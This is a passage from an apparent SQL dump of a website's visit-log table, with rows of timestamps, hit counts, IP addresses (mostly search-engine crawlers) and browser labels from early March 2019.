ther'),(395116,1551752530,1,1,0,0,'54.36.150.91','other'),(395117,1551752735,1,1,0,0,'54.36.148.32','other'),(395118,1551752821,1,1,0,0,'178.154.244.11','other'),(395119,1551753031,1,1,0,0,'66.249.64.218','chrome'),(395120,1551753064,1,1,0,0,'66.249.64.222','chrome'),(395121,1551753346,1,1,0,0,'66.249.64.220','chrome'),(395122,1551753398,1,1,0,0,'207.46.13.172','other'),(395123,1551753621,1,1,0,0,'207.46.13.174','other'),(395124,1551753857,1,1,0,0,'207.46.13.176','other'),(395125,1551753920,1,1,0,0,'54.36.150.153','other'),(395126,1551753947,1,1,0,0,'66.249.64.60','chrome'),(395127,1551754504,1,1,0,0,'134.209.40.209','other'),(395128,1551754518,1,1,0,0,'54.36.148.0','other'),(395129,1551754959,1,1,0,0,'54.36.149.1','other'),(395130,1551754961,1,1,0,0,'54.36.150.23','other'),(395131,1551755251,1,1,0,0,'54.36.148.138','other'),(395132,1551755281,1,1,0,0,'54.36.148.249','other'),(395133,1551755717,1,1,0,0,'66.249.64.58','chrome'),(395134,1551755734,2,2,0,0,'66.249.64.218','chrome'),(395135,1551755789,1,1,0,0,'95.163.255.42','other'),(395136,1551756347,1,1,0,0,'46.229.168.134','other'),(395137,1551756974,1,1,0,0,'216.244.66.241','other'),(395138,1551757063,1,1,0,0,'66.249.64.218','chrome'),(395139,1551757136,1,1,0,0,'66.249.64.220','chrome'),(395140,1551757397,1,1,0,0,'54.36.150.187','other'),(395141,1551757930,1,1,0,0,'54.36.148.249','other'),(395142,1551758288,1,1,0,0,'54.36.150.169','other'),(395143,1551758490,1,1,0,0,'46.229.168.136','other'),(395144,1551758581,1,1,0,0,'54.36.150.175','other'),(395145,1551758585,1,1,0,0,'54.36.149.52','other'),(395146,1551758700,1,1,0,0,'54.36.149.24','other'),(395147,1551758929,1,1,0,0,'66.249.64.58','chrome'),(395148,1551758931,1,1,0,0,'54.36.148.218','other'),(395149,1551759446,2,2,0,0,'8.29.198.27','other'),(395150,1551759599,1,1,0,0,'54.36.150.134','other'),(395151,1551760150,1,1,0,0,'54.36.148.56','other'),(395152,1551760636,1,1,0,0,'54.36.150.78','other'),(395153,1551761187,1,1,0,0,'95.163.255.49','other'),(395154,1551761783,1,1,0,0,'54.36.148.233','other'),(395155,1551762080,1,1,0,0,'31.184.238.11','chrome'),(395156,1551762502,1,1,0,0,'54.36.148.48','other'),(395157,1551762807,1,1,0,0,'54.36.149.3','other'),(395158,1551763326,1,1,0,0,'66.249.64.222','chrome'),(395159,1551763480,1,1,0,0,'66.249.64.218','chrome'),(395160,1551763534,1,1,0,0,'54.36.150.108','other'),(395161,1551763659,1,1,0,0,'54.36.149.59','other'),(395162,1551763813,2,2,0,0,'35.164.184.16','chrome'),(395163,1551763977,1,1,0,0,'54.36.149.69','other'),(395164,1551764055,1,1,0,0,'54.36.148.159','other'),(395165,1551764968,1,1,0,0,'46.229.168.151','other'),(395166,1551765124,1,1,0,0,'66.249.64.220','chrome'),(395167,1551765918,1,1,0,0,'207.46.13.172','other'),(395168,1551766209,1,1,0,0,'185.220.101.69','other'),(395169,1551766635,1,1,0,0,'87.250.224.47','other'),(395170,1551766934,1,1,0,0,'66.249.64.222','chrome'),(395171,1551766965,2,2,0,0,'5.45.207.19','other'),(395172,1551767012,3,3,0,0,'5.45.207.79','other'),(395173,1551767510,4,4,0,0,'178.154.244.11','other'),(395174,1551767546,1,1,0,0,'178.154.171.24','other'),(395175,1551767724,1,1,0,0,'66.249.64.220','chrome'),(395176,1551767726,1,1,0,0,'207.46.13.172','other'),(395177,1551767843,2,2,0,0,'141.8.142.103','other'),(395178,1551768087,4,4,0,0,'5.45.207.79','other'),(395179,1551768118,1,1,0,0,'91.196.178.94','firefox'),(395180,1551768517,3,3,0,0,'178.154.244.11','other'),(395181,1551768590,1,1,0,0,'5.188.210.53','chrome'),(395182,1551768600,1,1,0,0,'207.46.13.174','other'),(395183,1551768654,2,2,0,0,'5.45.207.19','other'),(395184,1551768678,1,1,0,0,'91.196.177.46','firefox'),(395185,1551768903,1,1,0,0,'91.196.177.46','chrome'),(395186,1551769982,1,1,0,0,'91.196.178.134','firefox'),(395187,1551770305,1,1,0,0,'8.29.198.26','other'),(395188,1551770376,1,1,0,0,'8.29.198.27','other'),(395189,1551770971,1,1,0,0,'180.76.15.12','other'),(395190,1551771010,2,2,0,0,'178.154.244.11','other'),(395191,1551771203,8,8,0,0,'176.9.9.94','other'),(395192,1551771357,1,1,0,0,'207.46.13.174','other'),(395193,1551771814,1,1,0,0,'185.30.202.101','chrome'),(395194,1551771939,1,1,0,0,'5.188.210.65','chrome'),(395195,1551772108,4,4,0,0,'176.9.9.94','other'),(395196,1551772481,1,1,0,0,'46.229.168.144','other'),(395197,1551772485,1,1,0,0,'46.229.168.147','other'),(395198,1551772782,1,1,0,0,'91.196.177.46','chrome'),(395199,1551772819,1,1,0,0,'46.229.168.130','other'),(395200,1551772829,1,1,0,0,'216.244.66.241','other'),(395201,1551773262,1,1,0,0,'207.46.13.174','other'),(395202,1551773694,1,1,0,0,'94.179.147.128','chrome'),(395203,1551774356,2,2,0,0,'46.133.202.190','other'),(395204,1551774455,1,1,0,0,'207.46.13.132','other'),(395205,1551774527,1,1,0,0,'91.196.178.93','firefox'),(395206,1551774530,1,1,0,0,'66.249.64.222','chrome'),(395207,1551774874,1,1,0,0,'46.229.168.134','other'),(395208,1551775560,1,1,0,0,'157.55.39.253','other'),(395209,1551775735,1,1,0,0,'91.213.33.106','chrome'),(395210,1551775903,1,1,0,0,'77.232.153.155','chrome'),(395211,1551776441,1,1,0,0,'46.229.168.154','other'),(395212,1551777479,1,1,0,0,'207.46.13.86','other'),(395213,1551777666,1,1,0,0,'40.77.167.96','other'),(395214,1551778220,1,1,0,0,'91.196.178.93','firefox'),(395215,1551778267,1,1,0,0,'66.249.64.218','chrome'),(395216,1551778581,1,1,0,0,'37.53.225.72','chrome'),(395217,1551778698,1,1,0,0,'37.55.239.180','chrome'),(395218,1551779144,1,1,0,0,'207.46.13.86','other'),(395219,1551779343,1,1,0,0,'95.163.255.48','other'),(395220,1551780409,1,1,0,0,'91.209.11.236','other'),(395221,1551780433,1,1,0,0,'193.194.124.206','chrome'),(395222,1551780541,2,2,0,0,'216.244.66.241','other'),(395223,1551780859,1,1,0,0,'66.249.64.220','chrome'),(395224,1551781168,1,1,0,0,'8.29.198.27','other'),(395225,1551781227,1,1,0,0,'8.29.198.25','other'),(395226,1551782186,1,1,0,0,'207.46.13.141','other'),(395227,1551782312,1,1,0,0,'46.229.168.129','other'),(395228,1551783063,1,1,0,0,'46.229.168.145','other'),(395229,1551783143,2,1,1,0,'66.249.64.218',''),(395230,1551783154,1,1,0,0,'207.46.13.132','other'),(395231,1551784040,1,1,0,0,'107.178.239.199','firefox'),(395232,1551784088,1,1,0,0,'216.244.66.241','other'),(395233,1551784369,1,1,0,0,'13.66.139.0','other'),(395234,1551784417,2,2,0,0,'80.254.155.43','chrome'),(395235,1551784827,1,1,0,0,'37.9.113.20','other'),(395236,1551784831,1,1,0,0,'178.154.171.24','other'),(395237,1551784891,1,1,0,0,'95.108.213.50','other'),(395238,1551784907,4,4,0,0,'213.180.203.48','other'),(395239,1551785361,1,1,0,0,'91.192.133.225','chrome'),(395240,1551785503,1,1,0,0,'5.45.207.80','other'),(395241,1551785529,1,1,0,0,'87.250.224.47','other'),(395242,1551785560,1,1,0,0,'5.255.253.38','other'),(395243,1551785608,1,1,0,0,'5.255.253.25','other'),(395244,1551785925,1,1,0,0,'141.8.142.38','other'),(395245,1551786111,1,1,0,0,'141.8.142.103','other'),(395246,1551786114,1,1,0,0,'95.108.213.4','other'),(395247,1551786196,1,1,0,0,'95.108.181.96','other'),(395248,1551786217,2,2,0,0,'66.249.64.220','chrome'),(395249,1551786270,1,1,0,0,'178.154.200.48','other'),(395250,1551786367,2,2,0,0,'216.244.66.241','other'),(395251,1551786550,1,1,0,0,'5.45.207.80','other'),(395252,1551786735,1,1,0,0,'91.192.133.225','chrome'),(395253,1551786752,1,1,0,0,'5.255.253.25','other'),(395254,1551786797,2,2,0,0,'213.180.203.17','other'),(395255,1551786799,1,1,0,0,'141.8.142.81','other'),(395256,1551786962,1,1,0,0,'95.108.181.83','other'),(395257,1551787064,1,1,0,0,'46.229.168.140','other'),(395258,1551787163,1,1,0,0,'141.8.142.103','other'),(395259,1551787216,1,1,0,0,'213.180.203.53','other'),(395260,1551787241,1,1,0,0,'87.250.224.47','other'),(395261,1551787627,1,1,0,0,'178.154.244.11','other'),(395262,1551788485,1,1,0,0,'66.249.64.220','chrome'),(395263,1551788880,1,1,0,0,'178.251.108.136','chrome'),(395264,1551789532,1,1,0,0,'46.229.168.135','other'),(395265,1551789552,1,1,0,0,'46.229.168.129','other'),(395266,1551789831,1,1,0,0,'91.196.178.76','firefox'),(395267,1551790378,1,1,0,0,'40.77.167.14','other'),(395268,1551791018,1,1,0,0,'5.45.207.79','other'),(395269,1551791516,1,1,0,0,'195.211.174.142','chrome'),(395270,1551791635,1,1,0,0,'54.36.150.85','other'),(395271,1551791710,1,1,0,0,'46.229.168.137','other'),(395272,1551791848,1,1,0,0,'54.36.149.107','other'),(395273,1551791998,1,1,0,0,'178.54.130.68','chrome'),(395274,1551792022,1,1,0,0,'91.196.178.165','chrome'),(395275,1551792024,1,1,0,0,'8.29.198.27','other'),(395276,1551792045,1,1,0,0,'54.36.150.161','other'),(395277,1551792060,1,1,0,0,'54.36.148.123','other'),(395278,1551792114,1,1,0,0,'8.29.198.25','other'),(395279,1551792421,1,1,0,0,'91.196.178.179','chrome'),(395280,1551792851,1,1,0,0,'54.36.148.115','other'),(395281,1551793239,1,1,0,0,'157.55.39.161','other'),(395282,1551793473,1,1,0,0,'54.36.148.11','other'),(395283,1551793574,2,2,0,0,'178.54.130.68','chrome'),(395284,1551794206,1,1,0,0,'157.55.39.228','other'),(395285,1551794246,1,1,0,0,'54.36.149.63','other'),(395286,1551794849,1,1,0,0,'54.36.148.150','other'),(395287,1551795436,1,1,0,0,'54.36.148.135','other'),(395288,1551795826,1,1,0,0,'54.36.148.137','other'),(395289,1551795891,1,1,0,0,'91.196.178.130','firefox'),(395290,1551795926,1,1,0,0,'54.36.148.67','other'),(395291,1551796242,1,1,0,0,'54.36.148.64','other'),(395292,1551796297,1,1,0,0,'54.36.149.52','other'),(395293,1551796364,1,1,0,0,'54.36.148.52','other'),(395294,1551796613,1,1,0,0,'157.55.39.161','other'),(395295,1551796943,1,1,0,0,'54.36.150.18','other'),(395296,1551797227,1,1,0,0,'46.211.24.18','chrome'),(395297,1551797516,3,3,0,0,'207.46.13.86','other'),(395298,1551797521,2,2,0,0,'157.55.39.161','other'),(395299,1551797526,6,6,0,0,'157.55.39.217','other'),(395300,1551797527,2,2,0,0,'91.196.178.165','chrome'),(395301,1551797565,7,7,0,0,'157.55.39.228','other'),(395302,1551797615,1,1,0,0,'54.36.148.187','other'),(395303,1551797648,1,1,0,0,'54.36.150.42','other'),(395304,1551797715,1,1,0,0,'141.8.142.103','other'),(395305,1551798030,1,1,0,0,'134.209.46.186','other'),(395306,1551798130,1,1,0,0,'165.227.103.6','other'),(395307,1551798261,1,1,0,0,'54.36.148.185','other'),(395308,1551798698,1,1,0,0,'54.36.148.179','other'),(395309,1551798779,1,1,0,0,'178.54.130.68','chrome'),(395310,1551798785,1,1,0,0,'54.36.148.249','other'),(395311,1551798827,1,1,0,0,'54.36.148.130','other'),(395312,1551799748,1,1,0,0,'54.36.150.54','other'),(395313,1551799782,1,1,0,0,'216.244.66.241','other'),(395314,1551799817,1,1,0,0,'193.111.49.60','chrome'),(395315,1551800177,1,1,0,0,'54.36.150.24','other'),(395316,1551800194,1,1,0,0,'54.36.149.40','other'),(395317,1551800196,1,1,0,0,'91.196.178.74','firefox'),(395318,1551800505,1,1,0,0,'66.249.64.62','chrome'),(395319,1551800527,2,2,0,0,'95.108.213.4','other'),(395320,1551800536,1,1,0,0,'5.45.207.19','other'),(395321,1551800770,3,3,0,0,'178.154.244.11','other'),(395322,1551801212,1,1,0,0,'54.36.150.84','other'),(395323,1551801242,1,1,0,0,'54.36.148.84','other'),(395324,1551801448,2,2,0,0,'5.45.207.19','other'),(395325,1551801521,1,1,0,0,'54.36.148.221','other'),(395326,1551801680,2,2,0,0,'141.8.142.103','other'),(395327,1551801904,1,1,0,0,'66.249.64.218','chrome'),(395328,1551802029,1,1,0,0,'54.36.150.40','other'),(395329,1551802196,1,1,0,0,'66.249.64.222','chrome'),(395330,1551802243,3,3,0,0,'178.154.244.11','other'),(395331,1551802491,1,1,0,0,'5.45.207.19','other'),(395332,1551802550,1,1,0,0,'54.36.150.77','other'),(395333,1551802624,1,1,0,0,'54.36.150.102','other'),(395334,1551802689,1,1,0,0,'141.8.142.103','other'),(395335,1551802791,1,1,0,0,'54.36.150.167','other'),(395336,1551802854,1,1,0,0,'54.36.148.234','other'),(395337,1551802894,1,1,0,0,'8.29.198.25','other'),(395338,1551802979,1,1,0,0,'8.29.198.27','other'),(395339,1551803144,1,1,0,0,'54.36.149.99','other'),(395340,1551803152,1,1,0,0,'54.36.150.42','other'),(395341,1551803551,1,1,0,0,'54.36.150.158','other'),(395342,1551803745,1,1,0,0,'207.46.13.86','other'),(395343,1551803752,10,10,0,0,'176.9.9.94','other'),(395344,1551803937,1,1,0,0,'46.211.114.198','chrome'),(395345,1551803998,1,1,0,0,'54.36.149.37','other'),(395346,1551804190,1,1,0,0,'54.36.148.24','other'),(395347,1551804263,1,1,0,0,'54.36.149.25','other'),(395348,1551804313,1,1,0,0,'54.36.149.43','other'),(395349,1551804462,1,1,0,0,'216.244.66.241','other'),(395350,1551804654,4,4,0,0,'176.9.9.94','other'),(395351,1551805184,1,1,0,0,'66.249.64.58','chrome'),(395352,1551805316,1,1,0,0,'54.36.150.29','other'),(395353,1551805499,1,1,0,0,'66.249.64.218','chrome'),(395354,1551805519,1,1,0,0,'216.244.66.241','other'),(395355,1551806101,1,1,0,0,'66.249.64.58','chrome'),(395356,1551806225,1,1,0,0,'46.229.168.140','other'),(395357,1551807193,1,1,0,0,'54.36.148.183','other'),(395358,1551807488,1,1,0,0,'216.244.66.241','other'),(395359,1551807656,1,1,0,0,'66.249.64.220','chrome'),(395360,1551807739,1,1,0,0,'184.94.240.92','firefox'),(395361,1551807748,1,1,0,0,'157.55.39.161','other'),(395362,1551807845,1,1,0,0,'54.36.150.170','other'),(395363,1551808072,1,1,0,0,'91.196.178.41','chrome'),(395364,1551808174,1,1,0,0,'54.36.149.21','other'),(395365,1551808408,1,1,0,0,'54.36.149.78','other'),(395366,1551808416,2,2,0,0,'178.154.244.11','other'),(395367,1551808874,1,1,0,0,'66.249.64.222','chrome'),(395368,1551808991,1,1,0,0,'54.36.150.74','other'),(395369,1551809112,1,1,0,0,'54.36.148.240','other'),(395370,1551809189,1,1,0,0,'66.249.64.218','chrome'),(395371,1551809355,1,1,0,0,'66.249.64.62','chrome'),(395372,1551809455,1,1,0,0,'54.36.148.31','other'),(395373,1551809469,1,1,0,0,'157.55.39.217','other'),(395374,1551809949,1,1,0,0,'46.96.27.147','chrome'),(395375,1551809973,1,1,0,0,'91.196.178.165','chrome'),(395376,1551810038,1,1,0,0,'91.196.177.228','chrome'),(395377,1551810068,1,1,0,0,'46.229.168.147','other'),(395378,1551810586,1,1,0,0,'54.36.150.72','other'),(395379,1551810714,1,1,0,0,'54.36.148.151','other'),(395380,1551810734,1,1,0,0,'54.36.149.96','other'),(395381,1551811168,1,1,0,0,'54.36.150.21','other'),(395382,1551811443,1,1,0,0,'54.36.150.175','other'),(395383,1551811681,1,1,0,0,'66.249.64.222','chrome'),(395384,1551811788,1,1,0,0,'46.229.168.153','other'),(395385,1551811800,1,1,0,0,'54.36.150.40','other'),(395386,1551811826,1,1,0,0,'54.36.150.10','other'),(395387,1551811912,1,1,0,0,'54.36.148.82','other'),(395388,1551812021,1,1,0,0,'40.77.167.158','other'),(395389,1551812139,1,1,0,0,'54.36.148.65','other'),(395390,1551812446,1,1,0,0,'66.249.64.218','chrome'),(395391,1551812642,1,1,0,0,'54.36.148.140','other'),(395392,1551812651,1,1,0,0,'54.36.148.49','other'),(395393,1551813296,1,1,0,0,'54.36.148.232','other'),(395394,1551813356,1,1,0,0,'54.36.150.141','other'),(395395,1551813545,1,1,0,0,'54.36.150.86','other'),(395396,1551813674,1,1,0,0,'37.139.187.111','chrome'),(395397,1551813760,2,2,0,0,'8.29.198.26','other'),(395398,1551814503,1,1,0,0,'54.36.148.234','other'),(395399,1551815166,1,1,0,0,'54.36.148.66','other'),(395400,1551815264,1,1,0,0,'212.47.239.148','firefox'),(395401,1551815763,1,1,0,0,'46.229.168.138','other'),(395402,1551815975,1,1,0,0,'207.46.13.164','other'),(395403,1551816013,1,1,0,0,'157.55.39.197','other'),(395404,1551817121,1,1,0,0,'91.196.177.228','chrome'),(395405,1551817125,1,1,0,0,'46.229.168.129','other'),(395406,1551817388,1,1,0,0,'46.229.168.154','other'),(395407,1551817474,1,1,0,0,'46.229.168.150','other'),(395408,1551818279,1,1,0,0,'54.36.150.84','other'),(395409,1551818304,2,2,0,0,'66.249.64.222','chrome'),(395410,1551818310,1,1,0,0,'54.36.148.182','other'),(395411,1551818456,1,1,0,0,'54.36.150.92','other'),(395412,1551818542,1,1,0,0,'91.209.11.236','other'),(395413,1551818890,1,1,0,0,'46.229.168.129','other'),(395414,1551818906,2,2,0,0,'66.249.64.220','chrome'),(395415,1551819164,1,1,0,0,'207.46.13.164','other'),(395416,1551819331,3,3,0,0,'5.45.207.79','other'),(395417,1551819388,2,2,0,0,'141.8.142.103','other'),(395418,1551819415,4,4,0,0,'5.45.207.19','other'),(395419,1551819719,1,1,0,0,'66.249.64.218','chrome'),(395420,1551819767,2,2,0,0,'95.108.213.4','other'),(395421,1551819904,1,1,0,0,'54.36.150.165','other'),(395422,1551819932,1,1,0,0,'66.249.64.220','chrome'),(395423,1551820284,1,1,0,0,'178.154.244.11','other'),(395424,1551820464,1,1,0,0,'5.45.207.19','other'),(395425,1551820619,1,1,0,0,'37.9.113.20','other'),(395426,1551820704,1,1,0,0,'178.154.171.24','other'),(395427,1551820747,1,1,0,0,'141.8.142.103','other'),(395428,1551820812,1,1,0,0,'87.250.224.47','other'),(395429,1551820898,1,1,0,0,'54.36.148.86','other'),(395430,1551821388,1,1,0,0,'54.36.148.211','other'),(395431,1551821458,1,1,0,0,'54.36.148.12','other'),(395432,1551821539,1,1,0,0,'54.36.150.105','other'),(395433,1551821594,1,1,0,0,'54.36.150.94','other'),(395434,1551821807,1,1,0,0,'54.36.149.98','other'),(395435,1551822028,1,1,0,0,'54.36.150.5','other'),(395436,1551822295,1,1,0,0,'54.36.148.255','other'),(395437,1551822529,1,1,0,0,'54.36.150.116','other'),(395438,1551822537,1,1,0,0,'54.36.150.25','other'),(395439,1551822550,1,1,0,0,'66.249.64.218','chrome'),(395440,1551823263,1,1,0,0,'54.36.150.79','other'),(395441,1551823599,1,1,0,0,'66.249.64.222','chrome'),(395442,1551823606,1,1,0,0,'54.36.150.187','other'),(395443,1551824054,1,1,0,0,'54.36.149.105','other'),(395444,1551824539,1,1,0,0,'66.249.64.218','chrome'),(395445,1551824608,1,1,0,0,'8.29.198.25','other'),(395446,1551824691,1,1,0,0,'8.29.198.27','other'),(395447,1551824776,1,1,0,0,'54.36.150.141','other'),(395448,1551825230,1,1,0,0,'66.249.64.220','chrome'),(395449,1551825458,1,1,0,0,'54.36.148.254','other'),(395450,1551825497,1,1,0,0,'54.36.148.235','other'),(395451,1551826119,1,1,0,0,'54.36.148.136','other'),(395452,1551826222,1,1,0,0,'216.244.66.241','other'),(395453,1551826625,1,1,0,0,'54.36.149.49','other'),(395454,1551828278,1,1,0,0,'66.249.64.220','chrome'),(395455,1551828534,1,1,0,0,'54.36.149.22','other'),(395456,1551828775,1,1,0,0,'54.36.150.59','other'),(395457,1551829041,1,1,0,0,'54.36.150.149','other'),(395458,1551829765,1,1,0,0,'157.55.39.116','other'),(395459,1551829796,1,1,0,0,'66.249.64.220','chrome'),(395460,1551830161,1,1,0,0,'157.55.39.63','other'),(395461,1551830188,1,1,0,0,'54.36.149.89','other'),(395462,1551830198,3,3,0,0,'66.249.64.222','chrome'),(395463,1551830207,1,1,0,0,'46.229.168.135','other'),(395464,1551830224,1,1,0,0,'54.36.148.231','other'),(395465,1551830390,1,1,0,0,'54.36.150.94','other'),(395466,1551830749,1,1,0,0,'54.36.148.142','other'),(395467,1551831018,1,1,0,0,'66.249.64.58','chrome'),(395468,1551831233,1,1,0,0,'216.244.66.241','other'),(395469,1551831393,1,1,0,0,'54.36.148.168','other'),(395470,1551831411,1,1,0,0,'54.36.150.149','other'),(395471,1551831431,1,1,0,0,'46.229.168.135','other'),(395472,1551832321,1,1,0,0,'157.55.39.116','other'),(395473,1551832391,1,1,0,0,'54.36.148.59','other'),(395474,1551832909,1,1,0,0,'66.249.64.58','chrome'),(395475,1551833066,1,1,0,0,'54.36.148.216','other'),(395476,1551833412,1,1,0,0,'157.55.39.116','other'),(395477,1551833547,2,2,0,0,'216.244.66.241','other'),(395478,1551833754,1,1,0,0,'54.36.148.86','other'),(395479,1551833895,1,1,0,0,'54.36.150.169','other'),(395480,1551833900,1,1,0,0,'51.255.65.46','other'),(395481,1551834590,3,3,0,0,'66.249.64.218','chrome'),(395482,1551834684,1,1,0,0,'66.249.64.222','chrome'),(395483,1551834779,1,1,0,0,'66.249.64.62','chrome'),(395484,1551835221,1,1,0,0,'54.36.150.34','other'),(395485,1551835257,1,1,0,0,'54.36.148.227','other'),(395486,1551835350,1,1,0,0,'54.36.150.106','other'),(395487,1551835477,2,2,0,0,'8.29.198.26','other'),(395488,1551835773,1,1,0,0,'46.229.168.148','other'),(395489,1551835787,1,1,0,0,'5.45.207.19','other'),(395490,1551835899,3,3,0,0,'141.8.142.103','other'),(395491,1551836048,1,1,0,0,'178.154.244.11','other'),(395492,1551836316,2,2,0,0,'95.108.213.4','other'),(395493,1551836560,3,3,0,0,'176.9.9.94','other'),(395494,1551836618,1,1,0,0,'54.36.149.84','other'),(395495,1551836710,1,1,0,0,'54.36.149.44','other'),(395496,1551836764,1,1,0,0,'66.249.64.58','chrome'),(395497,1551836847,1,1,0,0,'5.45.207.19','other'),(395498,1551836915,1,1,0,0,'87.250.224.47','other'),(395499,1551837207,2,2,0,0,'5.45.207.79','other'),(395500,1551837213,1,1,0,0,'54.36.149.70','other'),(395501,1551837224,6,6,0,0,'178.154.244.11','other'),(395502,1551837478,2,2,0,0,'46.229.168.144','other'),(395503,1551837541,1,1,0,0,'54.36.148.93','other'),(395504,1551837633,1,1,0,0,'54.36.148.229','other'),(395505,1551837678,1,1,0,0,'54.36.150.51','other'),(395506,1551837777,1,1,0,0,'5.45.207.19','other'),(395507,1551838133,1,1,0,0,'46.229.168.136','other'),(395508,1551838138,1,1,0,0,'178.154.244.11','other'),(395509,1551838304,1,1,0,0,'66.249.64.218','chrome'),(395510,1551838313,1,1,0,0,'54.36.148.121','other'),(395511,1551838370,1,1,0,0,'216.244.66.241','other'),(395512,1551838560,1,1,0,0,'87.250.224.47','other'),(395513,1551838645,1,1,0,0,'54.36.150.156','other'),(395514,1551838770,1,1,0,0,'5.45.207.19','other'),(395515,1551838772,1,1,0,0,'141.8.142.103','other'),(395516,1551838878,1,1,0,0,'54.36.149.26','other'),(395517,1551838920,1,1,0,0,'5.45.207.79','other'),(395518,1551839028,1,1,0,0,'54.36.149.37','other'),(395519,1551839371,1,1,0,0,'180.76.15.9','other'),(395520,1551839442,1,1,0,0,'46.229.168.144','other'),(395521,1551839813,1,1,0,0,'66.249.64.222','chrome'),(395522,1551839862,1,1,0,0,'54.36.150.154','other'),(395523,1551840004,1,1,0,0,'54.36.148.252','other'),(395524,1551840007,1,1,0,0,'157.55.39.161','other'),(395525,1551840445,1,1,0,0,'54.36.148.46','other'),(395526,1551840547,1,1,0,0,'54.36.150.142','other'),(395527,1551840576,1,1,0,0,'54.36.150.113','other'),(395528,1551840582,1,1,0,0,'54.36.148.85','other'),(395529,1551840970,1,1,0,0,'46.229.168.153','other'),(395530,1551841345,1,1,0,0,'54.36.148.168','other'),(395531,1551841371,1,1,0,0,'180.76.15.34','other'),(395532,1551841532,1,1,0,0,'54.36.148.98','other'),(395533,1551841536,1,1,0,0,'66.249.64.218','chrome'),(395534,1551841655,1,1,0,0,'46.229.168.143','other'),(395535,1551841846,1,1,0,0,'54.36.148.150','other'),(395536,1551841953,1,1,0,0,'54.36.148.203','other'),(395537,1551841959,2,2,0,0,'46.229.168.146','other'),(395538,1551842043,2,2,0,0,'141.8.142.103','other'),(395539,1551842177,1,1,0,0,'157.55.39.116','other'),(395540,1551842246,2,2,0,0,'5.45.207.79','other'),(395541,1551842249,1,1,0,0,'5.45.207.19','other'),(395542,1551842622,1,1,0,0,'54.36.148.47','other'),(395543,1551842646,1,1,0,0,'54.36.150.181','other'),(395544,1551843023,3,3,0,0,'178.154.244.11','other'),(395545,1551843156,2,2,0,0,'5.45.207.19','other'),(395546,1551843376,1,1,0,0,'157.55.39.63','other'),(395547,1551843640,1,1,0,0,'54.36.148.21','other'),(395548,1551844125,1,1,0,0,'54.36.149.81','other'),(395549,1551844237,2,2,0,0,'216.244.66.241','other'),(395550,1551844266,1,1,0,0,'46.229.168.148','other'),(395551,1551844379,1,1,0,0,'178.137.17.200','chrome'),(395552,1551844392,1,1,0,0,'54.36.150.24','other'),(395553,1551844457,1,1,0,0,'66.249.64.60','chrome'),(395554,1551844515,1,1,0,0,'66.249.64.222','chrome'),(395555,1551845071,1,1,0,0,'54.36.150.4','other'),(395556,1551845104,1,1,0,0,'54.36.148.106','other'),(395557,1551845187,1,1,0,0,'54.36.148.182','other'),(395558,1551845347,2,2,0,0,'157.55.39.116','other'),(395559,1551845431,1,1,0,0,'66.249.64.218','chrome'),(395560,1551845534,2,2,0,0,'54.212.107.159','chrome'),(395561,1551845856,1,1,0,0,'46.229.168.137','other'),(395562,1551845880,1,1,0,0,'54.36.148.246','other'),(395563,1551845958,1,1,0,0,'5.188.210.53','chrome'),(395564,1551845996,1,1,0,0,'54.36.148.79','other'),(395565,1551846172,1,1,0,0,'54.36.148.208','other'),(395566,1551846323,2,2,0,0,'8.29.198.26','other'),(395567,1551846330,1,1,0,0,'216.244.66.241','other'),(395568,1551846356,1,1,0,0,'66.249.64.220','chrome'),(395569,1551846386,1,1,0,0,'66.249.64.218','chrome'),(395570,1551846811,1,1,0,0,'54.36.149.89','other'),(395571,1551847210,1,1,0,0,'93.80.36.247','chrome'),(395572,1551847431,1,1,0,0,'157.55.39.116','other'),(395573,1551847832,1,1,0,0,'66.249.64.220','chrome'),(395574,1551847868,1,1,0,0,'54.36.150.51','other'),(395575,1551848926,1,1,0,0,'54.36.150.125','other'),(395576,1551849047,1,1,0,0,'66.249.64.222','chrome'),(395577,1551849119,1,1,0,0,'216.244.66.241','other'),(395578,1551849466,1,1,0,0,'5.188.210.65','chrome'),(395579,1551849775,1,1,0,0,'54.36.148.13','other'),(395580,1551850006,1,1,0,0,'46.229.168.150','other'),(395581,1551850272,1,1,0,0,'54.36.148.176','other'),(395582,1551850278,1,1,0,0,'180.76.15.154','other'),(395583,1551850687,2,2,0,0,'54.36.150.135','other'),(395584,1551850931,1,1,0,0,'157.55.39.63','other'),(395585,1551851047,1,1,0,0,'54.36.149.89','other'),(395586,1551851221,1,1,0,0,'54.36.149.21','other'),(395587,1551851553,1,1,0,0,'66.249.64.220','chrome'),(395588,1551851690,1,1,0,0,'54.36.150.109','other'),(395589,1551851773,1,1,0,0,'54.36.148.104','other'),(395590,1551852313,2,2,0,0,'66.249.64.222','chrome'),(395591,1551852331,1,1,0,0,'216.244.66.241','other'),(395592,1551852393,1,1,0,0,'54.36.148.161','other'),(395593,1551852529,1,1,0,0,'54.36.150.90','other'),(395594,1551852897,1,1,0,0,'46.211.126.250','chrome'),(395595,1551852902,1,1,0,0,'54.36.148.196','other'),(395596,1551852979,1,1,0,0,'54.36.148.140','other'),(395597,1551852991,1,1,0,0,'217.115.10.132','other'),(395598,1551853136,1,1,0,0,'54.36.150.85','other'),(395599,1551853934,1,1,0,0,'46.229.168.148','other'),(395600,1551854389,1,1,0,0,'46.229.168.151','other'),(395601,1551854444,1,1,0,0,'5.45.207.79','other'),(395602,1551854804,1,1,0,0,'157.55.39.116','other'),(395603,1551854883,2,2,0,0,'216.244.66.241','other'),(395604,1551854945,1,1,0,0,'46.229.168.152','other'),(395605,1551855132,1,1,0,0,'46.229.168.138','other'),(395606,1551855258,1,1,0,0,'51.255.65.46','other'),(395607,1551855325,1,1,0,0,'54.36.150.104','other'),(395608,1551855519,1,1,0,0,'54.36.148.98','other'),(395609,1551856176,1,1,0,0,'54.36.148.209','other'),(395610,1551856225,1,1,0,0,'54.36.149.20','other'),(395611,1551856913,1,1,0,0,'216.244.66.241','other'),(395612,1551857178,1,1,0,0,'8.29.198.25','other'),(395613,1551857237,1,1,0,0,'8.29.198.26','other'),(395614,1551857785,1,1,0,0,'54.36.148.37','other'),(395615,1551857822,1,1,0,0,'54.36.150.183','other'),(395616,1551857990,1,1,0,0,'54.36.148.198','other'),(395617,1551858005,1,1,0,0,'54.36.150.187','other'),(395618,1551858152,1,1,0,0,'157.55.39.116','other'),(395619,1551858213,1,1,0,0,'66.249.64.222','chrome'),(395620,1551858222,1,1,0,0,'92.113.127.233','firefox'),(395621,1551858246,1,1,0,0,'54.36.149.13','other'),(395622,1551858512,1,1,0,0,'141.8.142.103','other'),(395623,1551858810,1,1,0,0,'54.36.150.105','other'),(395624,1551859007,1,1,0,0,'66.249.64.220','chrome'),(395625,1551859349,1